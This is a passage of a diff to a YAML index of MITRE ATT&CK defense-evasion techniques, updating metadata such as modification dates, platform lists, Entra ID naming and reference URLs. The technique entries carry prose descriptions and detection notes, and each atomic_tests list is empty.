-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4412,6 +4517,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -4421,9 +4532,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -4433,13 +4549,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -4485,8 +4637,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -4505,13 +4657,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -4626,7 +4777,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -4667,7 +4817,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4706,8 +4856,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -4730,7 +4878,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4769,12 +4917,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -4801,6 +4947,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4818,12 +4965,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -4849,18 +4996,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4905,13 +5051,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -4983,7 +5128,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -5016,35 +5161,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -5052,9 +5196,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -5063,21 +5207,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -5117,9 +5262,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -5182,7 +5324,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -5242,7 +5383,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -5283,7 +5423,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5314,8 +5454,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -5405,7 +5543,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5429,12 +5567,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5513,7 +5650,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -5598,12 +5734,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5622,6 +5757,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -5629,7 +5765,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -5649,29 +5784,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -5722,7 +5859,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -5789,12 +5925,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -5830,6 +5965,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -5841,16 +5980,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -5886,12 +6021,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5899,14 +6034,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5921,6 +6055,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -5929,18 +6064,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -5972,14 +6107,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -6100,7 +6232,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -6174,12 +6305,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
